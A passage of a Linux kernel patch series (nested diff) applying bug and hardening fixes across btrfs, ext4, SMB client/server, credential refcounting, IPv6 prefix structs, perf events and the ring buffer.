+@@ -435,7 +435,7 @@ static netdev_tx_t gdm_lte_tx(struct sk_buff *skb, struct net_device *dev)
+ 	 * driver based on the NIC mac
+ 	 */
+ 	if (nic_type & NIC_TYPE_F_VLAN) {
+-		struct vlan_ethhdr *vlan_eth = (struct vlan_ethhdr *)skb->data;
++		struct vlan_ethhdr *vlan_eth = skb_vlan_eth_hdr(skb);
+ 
+ 		nic->vlan_id = ntohs(vlan_eth->h_vlan_TCI) & VLAN_VID_MASK;
+ 		data_buf = skb->data + (VLAN_ETH_HLEN - ETH_HLEN);
+diff --git a/fs/afs/rxrpc.c b/fs/afs/rxrpc.c
+index c62939e5ea1f0..37036db63aff3 100644
+--- a/fs/afs/rxrpc.c
++++ b/fs/afs/rxrpc.c
+@@ -424,7 +424,7 @@ error_kill_call:
+ 	if (call->async) {
+ 		if (cancel_work_sync(&call->async_work))
+ 			afs_put_call(call);
+-		afs_put_call(call);
++		afs_set_call_complete(call, ret, 0);
+ 	}
+ 
+ 	ac->error = ret;
+diff --git a/fs/btrfs/extent_io.c b/fs/btrfs/extent_io.c
+index afcc96a1f4276..539bc9bdcb93f 100644
+--- a/fs/btrfs/extent_io.c
++++ b/fs/btrfs/extent_io.c
+@@ -3390,7 +3390,8 @@ static int try_release_extent_state(struct extent_io_tree *tree,
+ 		ret = 0;
+ 	} else {
+ 		u32 clear_bits = ~(EXTENT_LOCKED | EXTENT_NODATASUM |
+-				   EXTENT_DELALLOC_NEW | EXTENT_CTLBITS);
++				   EXTENT_DELALLOC_NEW | EXTENT_CTLBITS |
++				   EXTENT_QGROUP_RESERVED);
+ 
+ 		/*
+ 		 * At this point we can safely clear everything except the
+diff --git a/fs/btrfs/ioctl.c b/fs/btrfs/ioctl.c
+index dc6e3cce747c1..e8e4781c48a50 100644
+--- a/fs/btrfs/ioctl.c
++++ b/fs/btrfs/ioctl.c
+@@ -2182,6 +2182,15 @@ static noinline int __btrfs_ioctl_snap_create(struct file *file,
+ 			 * are limited to own subvolumes only
+ 			 */
+ 			ret = -EPERM;
++		} else if (btrfs_ino(BTRFS_I(src_inode)) != BTRFS_FIRST_FREE_OBJECTID) {
++			/*
++			 * Snapshots must be made with the src_inode referring
++			 * to the subvolume inode, otherwise the permission
++			 * checking above is useless because we may have
++			 * permission on a lower directory but not the subvol
++			 * itself.
++			 */
++			ret = -EINVAL;
+ 		} else {
+ 			ret = btrfs_mksnapshot(&file->f_path, mnt_userns,
+ 					       name, namelen,
+diff --git a/fs/btrfs/ordered-data.c b/fs/btrfs/ordered-data.c
+index bd0c7157e3878..0321753c16b9f 100644
+--- a/fs/btrfs/ordered-data.c
++++ b/fs/btrfs/ordered-data.c
+@@ -544,7 +544,9 @@ void btrfs_remove_ordered_extent(struct btrfs_inode *btrfs_inode,
+ 			release = entry->disk_num_bytes;
+ 		else
+ 			release = entry->num_bytes;
+-		btrfs_delalloc_release_metadata(btrfs_inode, release, false);
++		btrfs_delalloc_release_metadata(btrfs_inode, release,
++						test_bit(BTRFS_ORDERED_IOERR,
++							 &entry->flags));
+ 	}
+ 
+ 	percpu_counter_add_batch(&fs_info->ordered_bytes, -entry->num_bytes,
+diff --git a/fs/ext4/file.c b/fs/ext4/file.c
+index 8ebe4dc7b0170..18f5fd2a163b0 100644
+--- a/fs/ext4/file.c
++++ b/fs/ext4/file.c
+@@ -339,9 +339,10 @@ static void ext4_inode_extension_cleanup(struct inode *inode, ssize_t count)
+ 		return;
+ 	}
+ 	/*
+-	 * If i_disksize got extended due to writeback of delalloc blocks while
+-	 * the DIO was running we could fail to cleanup the orphan list in
+-	 * ext4_handle_inode_extension(). Do it now.
++	 * If i_disksize got extended either due to writeback of delalloc
++	 * blocks or extending truncate while the DIO was running we could fail
++	 * to cleanup the orphan list in ext4_handle_inode_extension(). Do it
++	 * now.
+ 	 */
+ 	if (!list_empty(&EXT4_I(inode)->i_orphan) && inode->i_nlink) {
+ 		handle_t *handle = ext4_journal_start(inode, EXT4_HT_INODE, 2);
+@@ -376,10 +377,11 @@ static int ext4_dio_write_end_io(struct kiocb *iocb, ssize_t size,
+ 	 * blocks. But the code in ext4_iomap_alloc() is careful to use
+ 	 * zeroed/unwritten extents if this is possible; thus we won't leave
+ 	 * uninitialized blocks in a file even if we didn't succeed in writing
+-	 * as much as we intended.
++	 * as much as we intended. Also we can race with truncate or write
++	 * expanding the file so we have to be a bit careful here.
+ 	 */
+-	WARN_ON_ONCE(i_size_read(inode) < READ_ONCE(EXT4_I(inode)->i_disksize));
+-	if (pos + size <= READ_ONCE(EXT4_I(inode)->i_disksize))
++	if (pos + size <= READ_ONCE(EXT4_I(inode)->i_disksize) &&
++	    pos + size <= i_size_read(inode))
+ 		return size;
+ 	return ext4_handle_inode_extension(inode, pos, size);
+ }
+diff --git a/fs/ext4/mballoc.c b/fs/ext4/mballoc.c
+index 6ea6b7105fe35..a6e41746890d4 100644
+--- a/fs/ext4/mballoc.c
++++ b/fs/ext4/mballoc.c
+@@ -4110,6 +4110,10 @@ ext4_mb_normalize_request(struct ext4_allocation_context *ac,
+ 	start = max(start, rounddown(ac->ac_o_ex.fe_logical,
+ 			(ext4_lblk_t)EXT4_BLOCKS_PER_GROUP(ac->ac_sb)));
+ 
++	/* avoid unnecessary preallocation that may trigger assertions */
++	if (start + size > EXT_MAX_BLOCKS)
++		size = EXT_MAX_BLOCKS - start;
++
+ 	/* don't cover already allocated blocks in selected range */
+ 	if (ar->pleft && start <= ar->lleft) {
+ 		size -= ar->lleft + 1 - start;
+diff --git a/fs/fuse/dax.c b/fs/fuse/dax.c
+index e23e802a80130..6e71904c396f1 100644
+--- a/fs/fuse/dax.c
++++ b/fs/fuse/dax.c
+@@ -1224,6 +1224,7 @@ void fuse_dax_conn_free(struct fuse_conn *fc)
+ 	if (fc->dax) {
+ 		fuse_free_dax_mem_ranges(&fc->dax->free_ranges);
+ 		kfree(fc->dax);
++		fc->dax = NULL;
+ 	}
+ }
+ 
+diff --git a/fs/smb/client/smb2misc.c b/fs/smb/client/smb2misc.c
+index eaa5bd148810a..88942b1fb4318 100644
+--- a/fs/smb/client/smb2misc.c
++++ b/fs/smb/client/smb2misc.c
+@@ -313,6 +313,9 @@ static const bool has_smb2_data_area[NUMBER_OF_SMB2_COMMANDS] = {
+ char *
+ smb2_get_data_area_len(int *off, int *len, struct smb2_hdr *shdr)
+ {
++	const int max_off = 4096;
++	const int max_len = 128 * 1024;
++
+ 	*off = 0;
+ 	*len = 0;
+ 
+@@ -384,29 +387,20 @@ smb2_get_data_area_len(int *off, int *len, struct smb2_hdr *shdr)
+ 	 * Invalid length or offset probably means data area is invalid, but
+ 	 * we have little choice but to ignore the data area in this case.
+ 	 */
+-	if (*off > 4096) {
+-		cifs_dbg(VFS, "offset %d too large, data area ignored\n", *off);
+-		*len = 0;
+-		*off = 0;
+-	} else if (*off < 0) {
+-		cifs_dbg(VFS, "negative offset %d to data invalid ignore data area\n",
+-			 *off);
++	if (unlikely(*off < 0 || *off > max_off ||
++		     *len < 0 || *len > max_len)) {
++		cifs_dbg(VFS, "%s: invalid data area (off=%d len=%d)\n",
++			 __func__, *off, *len);
+ 		*off = 0;
+ 		*len = 0;
+-	} else if (*len < 0) {
+-		cifs_dbg(VFS, "negative data length %d invalid, data area ignored\n",
+-			 *len);
+-		*len = 0;
+-	} else if (*len > 128 * 1024) {
+-		cifs_dbg(VFS, "data area larger than 128K: %d\n", *len);
++	} else if (*off == 0) {
+ 		*len = 0;
+ 	}
+ 
+ 	/* return pointer to beginning of data area, ie offset from SMB start */
+-	if ((*off != 0) && (*len != 0))
++	if (*off > 0 && *len > 0)
+ 		return (char *)shdr + *off;
+-	else
+-		return NULL;
++	return NULL;
+ }
+ 
+ /*
+diff --git a/fs/smb/client/smb2ops.c b/fs/smb/client/smb2ops.c
+index 6ef3c00de5ca1..1b3489a2f0db7 100644
+--- a/fs/smb/client/smb2ops.c
++++ b/fs/smb/client/smb2ops.c
+@@ -3122,7 +3122,7 @@ smb2_query_reparse_tag(const unsigned int xid, struct cifs_tcon *tcon,
+ 	struct kvec close_iov[1];
+ 	struct smb2_ioctl_rsp *ioctl_rsp;
+ 	struct reparse_data_buffer *reparse_buf;
+-	u32 plen;
++	u32 off, count, len;
+ 
+ 	cifs_dbg(FYI, "%s: path: %s\n", __func__, full_path);
+ 
+@@ -3202,16 +3202,22 @@ smb2_query_reparse_tag(const unsigned int xid, struct cifs_tcon *tcon,
+ 	 */
+ 	if (rc == 0) {
+ 		/* See MS-FSCC 2.3.23 */
++		off = le32_to_cpu(ioctl_rsp->OutputOffset);
++		count = le32_to_cpu(ioctl_rsp->OutputCount);
++		if (check_add_overflow(off, count, &len) ||
++		    len > rsp_iov[1].iov_len) {
++			cifs_tcon_dbg(VFS, "%s: invalid ioctl: off=%d count=%d\n",
++				      __func__, off, count);
++			rc = -EIO;
++			goto query_rp_exit;
++		}
+ 
+-		reparse_buf = (struct reparse_data_buffer *)
+-			((char *)ioctl_rsp +
+-			 le32_to_cpu(ioctl_rsp->OutputOffset));
+-		plen = le32_to_cpu(ioctl_rsp->OutputCount);
+-
+-		if (plen + le32_to_cpu(ioctl_rsp->OutputOffset) >
+-		    rsp_iov[1].iov_len) {
+-			cifs_tcon_dbg(FYI, "srv returned invalid ioctl len: %d\n",
+-				 plen);
++		reparse_buf = (void *)((u8 *)ioctl_rsp + off);
++		len = sizeof(*reparse_buf);
++		if (count < len ||
++		    count < le16_to_cpu(reparse_buf->ReparseDataLength) + len) {
++			cifs_tcon_dbg(VFS, "%s: invalid ioctl: off=%d count=%d\n",
++				      __func__, off, count);
+ 			rc = -EIO;
+ 			goto query_rp_exit;
+ 		}
+@@ -5065,6 +5071,7 @@ receive_encrypted_standard(struct TCP_Server_Info *server,
+ 	struct smb2_hdr *shdr;
+ 	unsigned int pdu_length = server->pdu_size;
+ 	unsigned int buf_size;
++	unsigned int next_cmd;
+ 	struct mid_q_entry *mid_entry;
+ 	int next_is_large;
+ 	char *next_buffer = NULL;
+@@ -5093,14 +5100,15 @@ receive_encrypted_standard(struct TCP_Server_Info *server,
+ 	next_is_large = server->large_buf;
+ one_more:
+ 	shdr = (struct smb2_hdr *)buf;
+-	if (shdr->NextCommand) {
++	next_cmd = le32_to_cpu(shdr->NextCommand);
++	if (next_cmd) {
++		if (WARN_ON_ONCE(next_cmd > pdu_length))
++			return -1;
+ 		if (next_is_large)
+ 			next_buffer = (char *)cifs_buf_get();
+ 		else
+ 			next_buffer = (char *)cifs_small_buf_get();
+-		memcpy(next_buffer,
+-		       buf + le32_to_cpu(shdr->NextCommand),
+-		       pdu_length - le32_to_cpu(shdr->NextCommand));
++		memcpy(next_buffer, buf + next_cmd, pdu_length - next_cmd);
+ 	}
+ 
+ 	mid_entry = smb2_find_mid(server, buf);
+@@ -5124,8 +5132,8 @@ one_more:
+ 	else
+ 		ret = cifs_handle_standard(server, mid_entry);
+ 
+-	if (ret == 0 && shdr->NextCommand) {
+-		pdu_length -= le32_to_cpu(shdr->NextCommand);
++	if (ret == 0 && next_cmd) {
++		pdu_length -= next_cmd;
+ 		server->large_buf = next_is_large;
+ 		if (next_is_large)
+ 			server->bigbuf = buf = next_buffer;
+diff --git a/fs/smb/common/smb2pdu.h b/fs/smb/common/smb2pdu.h
+index 9619015d78f29..c8a4014f9d395 100644
+--- a/fs/smb/common/smb2pdu.h
++++ b/fs/smb/common/smb2pdu.h
+@@ -1116,7 +1116,7 @@ struct smb2_change_notify_rsp {
+ #define SMB2_CREATE_SD_BUFFER			"SecD" /* security descriptor */
+ #define SMB2_CREATE_DURABLE_HANDLE_REQUEST	"DHnQ"
+ #define SMB2_CREATE_DURABLE_HANDLE_RECONNECT	"DHnC"
+-#define SMB2_CREATE_ALLOCATION_SIZE		"AISi"
++#define SMB2_CREATE_ALLOCATION_SIZE		"AlSi"
+ #define SMB2_CREATE_QUERY_MAXIMAL_ACCESS_REQUEST "MxAc"
+ #define SMB2_CREATE_TIMEWARP_REQUEST		"TWrp"
+ #define SMB2_CREATE_QUERY_ON_DISK_ID		"QFid"
+diff --git a/fs/smb/server/smb2pdu.c b/fs/smb/server/smb2pdu.c
+index 683152007566c..1598ad6155fef 100644
+--- a/fs/smb/server/smb2pdu.c
++++ b/fs/smb/server/smb2pdu.c
+@@ -7135,6 +7135,7 @@ skip:
+ 						      smb2_remove_blocked_lock,
+ 						      argv);
+ 				if (rc) {
++					kfree(argv);
+ 					err = -ENOMEM;
+ 					goto out;
+ 				}
+diff --git a/include/asm-generic/qspinlock.h b/include/asm-generic/qspinlock.h
+index 995513fa26904..0655aa5b57b29 100644
+--- a/include/asm-generic/qspinlock.h
++++ b/include/asm-generic/qspinlock.h
+@@ -70,7 +70,7 @@ static __always_inline int queued_spin_is_locked(struct qspinlock *lock)
+  */
+ static __always_inline int queued_spin_value_unlocked(struct qspinlock lock)
+ {
+-	return !atomic_read(&lock.val);
++	return !lock.val.counter;
+ }
+ 
+ /**
+diff --git a/include/linux/cred.h b/include/linux/cred.h
+index 9ed9232af9340..09c1ed9242b4a 100644
+--- a/include/linux/cred.h
++++ b/include/linux/cred.h
+@@ -108,7 +108,7 @@ static inline int groups_search(const struct group_info *group_info, kgid_t grp)
+  * same context as task->real_cred.
+  */
+ struct cred {
+-	atomic_t	usage;
++	atomic_long_t	usage;
+ #ifdef CONFIG_DEBUG_CREDENTIALS
+ 	atomic_t	subscribers;	/* number of processes subscribed */
+ 	void		*put_addr;
+@@ -228,7 +228,7 @@ static inline bool cap_ambient_invariant_ok(const struct cred *cred)
+  */
+ static inline struct cred *get_new_cred(struct cred *cred)
+ {
+-	atomic_inc(&cred->usage);
++	atomic_long_inc(&cred->usage);
+ 	return cred;
+ }
+ 
+@@ -260,7 +260,7 @@ static inline const struct cred *get_cred_rcu(const struct cred *cred)
+ 	struct cred *nonconst_cred = (struct cred *) cred;
+ 	if (!cred)
+ 		return NULL;
+-	if (!atomic_inc_not_zero(&nonconst_cred->usage))
++	if (!atomic_long_inc_not_zero(&nonconst_cred->usage))
+ 		return NULL;
+ 	validate_creds(cred);
+ 	nonconst_cred->non_rcu = 0;
+@@ -284,7 +284,7 @@ static inline void put_cred(const struct cred *_cred)
+ 
+ 	if (cred) {
+ 		validate_creds(cred);
+-		if (atomic_dec_and_test(&(cred)->usage))
++		if (atomic_long_dec_and_test(&(cred)->usage))
+ 			__put_cred(cred);
+ 	}
+ }
+diff --git a/include/linux/if_vlan.h b/include/linux/if_vlan.h
+index 68b1c41332984..e0d0a645be7cf 100644
+--- a/include/linux/if_vlan.h
++++ b/include/linux/if_vlan.h
+@@ -62,6 +62,14 @@ static inline struct vlan_ethhdr *vlan_eth_hdr(const struct sk_buff *skb)
+ 	return (struct vlan_ethhdr *)skb_mac_header(skb);
+ }
+ 
++/* Prefer this version in TX path, instead of
++ * skb_reset_mac_header() + vlan_eth_hdr()
++ */
++static inline struct vlan_ethhdr *skb_vlan_eth_hdr(const struct sk_buff *skb)
++{
++	return (struct vlan_ethhdr *)skb->data;
++}
++
+ #define VLAN_PRIO_MASK		0xe000 /* Priority Code Point */
+ #define VLAN_PRIO_SHIFT		13
+ #define VLAN_CFI_MASK		0x1000 /* Canonical Format Indicator / Drop Eligible Indicator */
+@@ -531,7 +539,7 @@ static inline void __vlan_hwaccel_put_tag(struct sk_buff *skb,
+  */
+ static inline int __vlan_get_tag(const struct sk_buff *skb, u16 *vlan_tci)
+ {
+-	struct vlan_ethhdr *veth = (struct vlan_ethhdr *)skb->data;
++	struct vlan_ethhdr *veth = skb_vlan_eth_hdr(skb);
+ 
+ 	if (!eth_type_vlan(veth->h_vlan_proto))
+ 		return -EINVAL;
+@@ -732,7 +740,7 @@ static inline bool skb_vlan_tagged_multi(struct sk_buff *skb)
+ 		if (unlikely(!pskb_may_pull(skb, VLAN_ETH_HLEN)))
+ 			return false;
+ 
+-		veh = (struct vlan_ethhdr *)skb->data;
++		veh = skb_vlan_eth_hdr(skb);
+ 		protocol = veh->h_vlan_encapsulated_proto;
+ 	}
+ 
+diff --git a/include/linux/mm_inline.h b/include/linux/mm_inline.h
+index 4ef6c09cc2eec..c21e19a1514d1 100644
+--- a/include/linux/mm_inline.h
++++ b/include/linux/mm_inline.h
+@@ -231,22 +231,27 @@ static inline bool lru_gen_add_folio(struct lruvec *lruvec, struct folio *folio,
+ 	if (folio_test_unevictable(folio) || !lrugen->enabled)
+ 		return false;
+ 	/*
+-	 * There are three common cases for this page:
+-	 * 1. If it's hot, e.g., freshly faulted in or previously hot and
+-	 *    migrated, add it to the youngest generation.
+-	 * 2. If it's cold but can't be evicted immediately, i.e., an anon page
+-	 *    not in swapcache or a dirty page pending writeback, add it to the
+-	 *    second oldest generation.
+-	 * 3. Everything else (clean, cold) is added to the oldest generation.
++	 * There are four common cases for this page:
++	 * 1. If it's hot, i.e., freshly faulted in, add it to the youngest
++	 *    generation, and it's protected over the rest below.
++	 * 2. If it can't be evicted immediately, i.e., a dirty page pending
++	 *    writeback, add it to the second youngest generation.
++	 * 3. If it should be evicted first, e.g., cold and clean from
++	 *    folio_rotate_reclaimable(), add it to the oldest generation.
++	 * 4. Everything else falls between 2 & 3 above and is added to the
++	 *    second oldest generation if it's considered inactive, or the
++	 *    oldest generation otherwise. See lru_gen_is_active().
+ 	 */
+ 	if (folio_test_active(folio))
+ 		seq = lrugen->max_seq;
+ 	else if ((type == LRU_GEN_ANON && !folio_test_swapcache(folio)) ||
+ 		 (folio_test_reclaim(folio) &&
+ 		  (folio_test_dirty(folio) || folio_test_writeback(folio))))
+-		seq = lrugen->min_seq[type] + 1;
+-	else
++		seq = lrugen->max_seq - 1;
++	else if (reclaiming || lrugen->min_seq[type] + MIN_NR_GENS >= lrugen->max_seq)
+ 		seq = lrugen->min_seq[type];
++	else
++		seq = lrugen->min_seq[type] + 1;
+ 
+ 	gen = lru_gen_from_seq(seq);
+ 	flags = (gen + 1UL) << LRU_GEN_PGOFF;
+diff --git a/include/linux/usb/r8152.h b/include/linux/usb/r8152.h
+index 20d88b1defc30..33a4c146dc19c 100644
+--- a/include/linux/usb/r8152.h
++++ b/include/linux/usb/r8152.h
+@@ -29,6 +29,8 @@
+ #define VENDOR_ID_LINKSYS		0x13b1
+ #define VENDOR_ID_NVIDIA		0x0955
+ #define VENDOR_ID_TPLINK		0x2357
++#define VENDOR_ID_DLINK			0x2001
++#define VENDOR_ID_ASUS			0x0b05
+ 
+ #if IS_REACHABLE(CONFIG_USB_RTL8152)
+ extern u8 rtl8152_get_version(struct usb_interface *intf);
+diff --git a/include/net/addrconf.h b/include/net/addrconf.h
+index c04f359655b86..86eb2aba1479c 100644
+--- a/include/net/addrconf.h
++++ b/include/net/addrconf.h
+@@ -31,17 +31,22 @@ struct prefix_info {
+ 	__u8			length;
+ 	__u8			prefix_len;
+ 
++	union __packed {
++		__u8		flags;
++		struct __packed {
+ #if defined(__BIG_ENDIAN_BITFIELD)
+-	__u8			onlink : 1,
++			__u8	onlink : 1,
+ 			 	autoconf : 1,
+ 				reserved : 6;
+ #elif defined(__LITTLE_ENDIAN_BITFIELD)
+-	__u8			reserved : 6,
++			__u8	reserved : 6,
+ 				autoconf : 1,
+ 				onlink : 1;
+ #else
+ #error "Please fix <asm/byteorder.h>"
+ #endif
++		};
++	};
+ 	__be32			valid;
+ 	__be32			prefered;
+ 	__be32			reserved2;
+@@ -49,6 +54,9 @@ struct prefix_info {
+ 	struct in6_addr		prefix;
+ };
+ 
++/* rfc4861 4.6.2: IPv6 PIO is 32 bytes in size */
++static_assert(sizeof(struct prefix_info) == 32);
++
+ #include <linux/ipv6.h>
+ #include <linux/netdevice.h>
+ #include <net/if_inet6.h>
+diff --git a/include/net/if_inet6.h b/include/net/if_inet6.h
+index c8490729b4aea..31bf475eca762 100644
+--- a/include/net/if_inet6.h
++++ b/include/net/if_inet6.h
+@@ -22,10 +22,6 @@
+ #define IF_RS_SENT	0x10
+ #define IF_READY	0x80000000
+ 
+-/* prefix flags */
+-#define IF_PREFIX_ONLINK	0x01
+-#define IF_PREFIX_AUTOCONF	0x02
+-
+ enum {
+ 	INET6_IFADDR_STATE_PREDAD,
+ 	INET6_IFADDR_STATE_DAD,
+diff --git a/kernel/cred.c b/kernel/cred.c
+index e10c15f51c1fe..d35bc0aa98cba 100644
+--- a/kernel/cred.c
++++ b/kernel/cred.c
+@@ -99,17 +99,17 @@ static void put_cred_rcu(struct rcu_head *rcu)
+ 
+ #ifdef CONFIG_DEBUG_CREDENTIALS
+ 	if (cred->magic != CRED_MAGIC_DEAD ||
+-	    atomic_read(&cred->usage) != 0 ||
++	    atomic_long_read(&cred->usage) != 0 ||
+ 	    read_cred_subscribers(cred) != 0)
+ 		panic("CRED: put_cred_rcu() sees %p with"
+-		      " mag %x, put %p, usage %d, subscr %d\n",
++		      " mag %x, put %p, usage %ld, subscr %d\n",
+ 		      cred, cred->magic, cred->put_addr,
+-		      atomic_read(&cred->usage),
++		      atomic_long_read(&cred->usage),
+ 		      read_cred_subscribers(cred));
+ #else
+-	if (atomic_read(&cred->usage) != 0)
+-		panic("CRED: put_cred_rcu() sees %p with usage %d\n",
+-		      cred, atomic_read(&cred->usage));
++	if (atomic_long_read(&cred->usage) != 0)
++		panic("CRED: put_cred_rcu() sees %p with usage %ld\n",
++		      cred, atomic_long_read(&cred->usage));
+ #endif
+ 
+ 	security_cred_free(cred);
+@@ -134,11 +134,11 @@ static void put_cred_rcu(struct rcu_head *rcu)
+  */
+ void __put_cred(struct cred *cred)
+ {
+-	kdebug("__put_cred(%p{%d,%d})", cred,
+-	       atomic_read(&cred->usage),
++	kdebug("__put_cred(%p{%ld,%d})", cred,
++	       atomic_long_read(&cred->usage),
+ 	       read_cred_subscribers(cred));
+ 
+-	BUG_ON(atomic_read(&cred->usage) != 0);
++	BUG_ON(atomic_long_read(&cred->usage) != 0);
+ #ifdef CONFIG_DEBUG_CREDENTIALS
+ 	BUG_ON(read_cred_subscribers(cred) != 0);
+ 	cred->magic = CRED_MAGIC_DEAD;
+@@ -161,8 +161,8 @@ void exit_creds(struct task_struct *tsk)
+ {
+ 	struct cred *cred;
+ 
+-	kdebug("exit_creds(%u,%p,%p,{%d,%d})", tsk->pid, tsk->real_cred, tsk->cred,
+-	       atomic_read(&tsk->cred->usage),
++	kdebug("exit_creds(%u,%p,%p,{%ld,%d})", tsk->pid, tsk->real_cred, tsk->cred,
++	       atomic_long_read(&tsk->cred->usage),
+ 	       read_cred_subscribers(tsk->cred));
+ 
+ 	cred = (struct cred *) tsk->real_cred;
+@@ -221,7 +221,7 @@ struct cred *cred_alloc_blank(void)
+ 	if (!new)
+ 		return NULL;
+ 
+-	atomic_set(&new->usage, 1);
++	atomic_long_set(&new->usage, 1);
+ #ifdef CONFIG_DEBUG_CREDENTIALS
+ 	new->magic = CRED_MAGIC;
+ #endif
+@@ -267,7 +267,7 @@ struct cred *prepare_creds(void)
+ 	memcpy(new, old, sizeof(struct cred));
+ 
+ 	new->non_rcu = 0;
+-	atomic_set(&new->usage, 1);
++	atomic_long_set(&new->usage, 1);
+ 	set_cred_subscribers(new, 0);
+ 	get_group_info(new->group_info);
+ 	get_uid(new->user);
+@@ -355,8 +355,8 @@ int copy_creds(struct task_struct *p, unsigned long clone_flags)
+ 		p->real_cred = get_cred(p->cred);
+ 		get_cred(p->cred);
+ 		alter_cred_subscribers(p->cred, 2);
+-		kdebug("share_creds(%p{%d,%d})",
+-		       p->cred, atomic_read(&p->cred->usage),
++		kdebug("share_creds(%p{%ld,%d})",
++		       p->cred, atomic_long_read(&p->cred->usage),
+ 		       read_cred_subscribers(p->cred));
+ 		inc_rlimit_ucounts(task_ucounts(p), UCOUNT_RLIMIT_NPROC, 1);
+ 		return 0;
+@@ -449,8 +449,8 @@ int commit_creds(struct cred *new)
+ 	struct task_struct *task = current;
+ 	const struct cred *old = task->real_cred;
+ 
+-	kdebug("commit_creds(%p{%d,%d})", new,
+-	       atomic_read(&new->usage),
++	kdebug("commit_creds(%p{%ld,%d})", new,
++	       atomic_long_read(&new->usage),
+ 	       read_cred_subscribers(new));
+ 
+ 	BUG_ON(task->cred != old);
+@@ -459,7 +459,7 @@ int commit_creds(struct cred *new)
+ 	validate_creds(old);
+ 	validate_creds(new);
+ #endif
+-	BUG_ON(atomic_read(&new->usage) < 1);
++	BUG_ON(atomic_long_read(&new->usage) < 1);
+ 
+ 	get_cred(new); /* we will require a ref for the subj creds too */
+ 
+@@ -532,14 +532,14 @@ EXPORT_SYMBOL(commit_creds);
+  */
+ void abort_creds(struct cred *new)
+ {
+-	kdebug("abort_creds(%p{%d,%d})", new,
+-	       atomic_read(&new->usage),
++	kdebug("abort_creds(%p{%ld,%d})", new,
++	       atomic_long_read(&new->usage),
+ 	       read_cred_subscribers(new));
+ 
+ #ifdef CONFIG_DEBUG_CREDENTIALS
+ 	BUG_ON(read_cred_subscribers(new) != 0);
+ #endif
+-	BUG_ON(atomic_read(&new->usage) < 1);
++	BUG_ON(atomic_long_read(&new->usage) < 1);
+ 	put_cred(new);
+ }
+ EXPORT_SYMBOL(abort_creds);
+@@ -555,8 +555,8 @@ const struct cred *override_creds(const struct cred *new)
+ {
+ 	const struct cred *old = current->cred;
+ 
+-	kdebug("override_creds(%p{%d,%d})", new,
+-	       atomic_read(&new->usage),
++	kdebug("override_creds(%p{%ld,%d})", new,
++	       atomic_long_read(&new->usage),
+ 	       read_cred_subscribers(new));
+ 
+ 	validate_creds(old);
+@@ -578,8 +578,8 @@ const struct cred *override_creds(const struct cred *new)
+ 	rcu_assign_pointer(current->cred, new);
+ 	alter_cred_subscribers(old, -1);
+ 
+-	kdebug("override_creds() = %p{%d,%d}", old,
+-	       atomic_read(&old->usage),
++	kdebug("override_creds() = %p{%ld,%d}", old,
++	       atomic_long_read(&old->usage),
+ 	       read_cred_subscribers(old));
+ 	return old;
+ }
+@@ -596,8 +596,8 @@ void revert_creds(const struct cred *old)
+ {
+ 	const struct cred *override = current->cred;
+ 
+-	kdebug("revert_creds(%p{%d,%d})", old,
+-	       atomic_read(&old->usage),
++	kdebug("revert_creds(%p{%ld,%d})", old,
++	       atomic_long_read(&old->usage),
+ 	       read_cred_subscribers(old));
+ 
+ 	validate_creds(old);
+@@ -729,7 +729,7 @@ struct cred *prepare_kernel_cred(struct task_struct *daemon)
+ 
+ 	*new = *old;
+ 	new->non_rcu = 0;
+-	atomic_set(&new->usage, 1);
++	atomic_long_set(&new->usage, 1);
+ 	set_cred_subscribers(new, 0);
+ 	get_uid(new->user);
+ 	get_user_ns(new->user_ns);
+@@ -843,8 +843,8 @@ static void dump_invalid_creds(const struct cred *cred, const char *label,
+ 	       cred == tsk->cred ? "[eff]" : "");
+ 	printk(KERN_ERR "CRED: ->magic=%x, put_addr=%p\n",
+ 	       cred->magic, cred->put_addr);
+-	printk(KERN_ERR "CRED: ->usage=%d, subscr=%d\n",
+-	       atomic_read(&cred->usage),
++	printk(KERN_ERR "CRED: ->usage=%ld, subscr=%d\n",
++	       atomic_long_read(&cred->usage),
+ 	       read_cred_subscribers(cred));
+ 	printk(KERN_ERR "CRED: ->*uid = { %d,%d,%d,%d }\n",
+ 		from_kuid_munged(&init_user_ns, cred->uid),
+@@ -916,9 +916,9 @@ EXPORT_SYMBOL(__validate_process_creds);
+  */
+ void validate_creds_for_do_exit(struct task_struct *tsk)
+ {
+-	kdebug("validate_creds_for_do_exit(%p,%p{%d,%d})",
++	kdebug("validate_creds_for_do_exit(%p,%p{%ld,%d})",
+ 	       tsk->real_cred, tsk->cred,
+-	       atomic_read(&tsk->cred->usage),
++	       atomic_long_read(&tsk->cred->usage),
+ 	       read_cred_subscribers(tsk->cred));
+ 
+ 	__validate_process_creds(tsk, __FILE__, __LINE__);
+diff --git a/kernel/events/core.c b/kernel/events/core.c
+index 0193243f65e5c..8c7d2f4f5fbab 100644
+--- a/kernel/events/core.c
++++ b/kernel/events/core.c
+@@ -1945,6 +1945,16 @@ static bool perf_event_validate_size(struct perf_event *event)
+ 				   group_leader->nr_siblings + 1) > 16*1024)
+ 		return false;
+ 
++	/*
++	 * When creating a new group leader, group_leader->ctx is initialized
++	 * after the size has been validated, but we cannot safely use
++	 * for_each_sibling_event() until group_leader->ctx is set. A new group
++	 * leader cannot have any siblings yet, so we can safely skip checking
++	 * the non-existent siblings.
++	 */
++	if (event == group_leader)
++		return true;
++
+ 	for_each_sibling_event(sibling, group_leader) {
+ 		if (__perf_event_read_size(sibling->attr.read_format,
+ 					   group_leader->nr_siblings + 1) > 16*1024)
+diff --git a/kernel/trace/ring_buffer.c b/kernel/trace/ring_buffer.c
+index c02a4cb879913..61803208706a5 100644
+--- a/kernel/trace/ring_buffer.c
++++ b/kernel/trace/ring_buffer.c
+@@ -711,6 +711,9 @@ static int rb_time_cmpxchg(rb_time_t *t, u64 expect, u64 set)
+ 	unsigned long cnt2, top2, bottom2, msb2;
+ 	u64 val;
+ 
++	/* Any interruptions in this function should cause a failure */
++	cnt = local_read(&t->cnt);
++
+ 	/* The cmpxchg always fails if it interrupted an update */
+ 	 if (!__rb_time_read(t, &val, &cnt2))
+ 		 return false;
+@@ -718,17 +721,18 @@ static int rb_time_cmpxchg(rb_time_t *t, u64 expect, u64 set)
+ 	 if (val != expect)
+ 		 return false;
+ 
+-	 cnt = local_read(&t->cnt);
+ 	 if ((cnt & 3) != cnt2)
+ 		 return false;
+ 
+ 	 cnt2 = cnt + 1;
+ 
+ 	 rb_time_split(val, &top, &bottom, &msb);
++	 msb = rb_time_val_cnt(msb, cnt);
+ 	 top = rb_time_val_cnt(top, cnt);
+ 	 bottom = rb_time_val_cnt(bottom, cnt);
+ 
+ 	 rb_time_split(set, &top2, &bottom2, &msb2);
